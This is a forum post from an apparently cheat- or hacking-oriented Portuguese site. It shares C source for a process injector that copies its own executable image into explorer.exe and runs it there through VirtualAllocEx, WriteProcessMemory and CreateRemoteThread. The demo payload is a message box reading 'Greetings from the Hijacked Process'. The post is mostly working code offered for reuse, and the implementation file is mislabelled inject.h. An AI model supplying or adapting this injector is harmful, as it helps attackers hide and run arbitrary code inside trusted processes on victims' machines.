UnrealSkill-VIP
Gostaria de reagir a esta mensagem? Crie uma conta em poucos cliques ou inicie sessão para continuar.

[Source] Process Injection

Ir em baixo

[Source] Process Injection  Empty [Source] Process Injection

Mensagem por uNreal 11/7/2020, 00:34

Process Injection
This project allows you to copy the local process into another remote process and execute it. There are no requirements for your program for this to work. All you do is call the function, and sit back and the program will run inside the remote address space just as if it was in it's own. You do not need to pass memory addresses to the thread because, the Injected program is set at it's own original address in memory so all variables and functions defined will still work.
But this will not work on all running processes because the ImageBase required by the injector executable maybe already Allocated by the process, therefore causing the VirtualAllocEx to fail. If you were to make this work on all process you would first have to rebase the injector in memory, then inject it.
The default imagebase for an executable most of the time is 0x400000 which is available in Explorer.exe, so this process was chosen as example.

[Source] Process Injection  2914-1

inject.h
Código:
/* Injection Prototypes */
#include <windows.h>

BOOL InjectExecutable(DWORD dwPid, LPTHREAD_START_ROUTINE lpStartProc, LPVOID lpParam);
inject.h
Código:
#include "inject.h"
BOOL InjectExecutable(DWORD dwPid, LPTHREAD_START_ROUTINE lpStartProc, LPVOID lpParam)
{
 HMODULE hModule, hNewModule;
 DWORD dwSize;
 HANDLE hProcess;
 IMAGE_DOS_HEADER ImageDosHeader;
 IMAGE_OPTIONAL_HEADER32 ImageOptionalHeader;
 hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);

 if (hProcess == NULL)
 {
 return FALSE;
 }
 hModule = GetModuleHandle(NULL);
 CopyMemory(&ImageDosHeader, hModule, sizeof(ImageDosHeader));
 CopyMemory(&ImageOptionalHeader, ((BYTE *)hModule + sizeof(DWORD) + ImageDosHeader.e_lfanew + sizeof(IMAGE_FILE_HEADER)), sizeof(ImageOptionalHeader));
 dwSize = ImageOptionalHeader.SizeOfImage;

 hNewModule = VirtualAllocEx(hProcess, hModule, dwSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

 if (hNewModule == NULL)
 {
 return FALSE;
 }

 WriteProcessMemory(hProcess, hNewModule, hModule, dwSize, NULL);
 CreateRemoteThread(hProcess, 0, 0, lpStartProc, lpParam, 0, NULL);
 return TRUE;

}
example.c
Código:
#include "inject.h"
DWORD WINAPI RemFunc(LPVOID lpParam);
void WinMainCRTStartup()
{
 DWORD dwPid;
 GetWindowThreadProcessId(FindWindow("ProgMan", NULL), &dwPid);
 InjectExecutable(dwPid, &RemFunc, NULL);
}

DWORD WINAPI RemFunc(LPVOID lpParam)
{
 MessageBox(HWND_DESKTOP, "Greetings from the Hijacked Process!!!!nDone with ProcessInjectionn.::ANUBIS::.", "Explorer", MB_OK);
 ExitThread(0);
 return 0;
}


Última edição por uNreal em 11/7/2020, 00:37, editado 1 vez(es) (Motivo da edição : Add Crédit:ANUBIS)
uNreal
uNreal
ADM
ADM


Voltar ao Topo Ir em baixo

Voltar ao Topo


 
Permissão neste fórum:
Você não pode responder aos tópicos neste fórum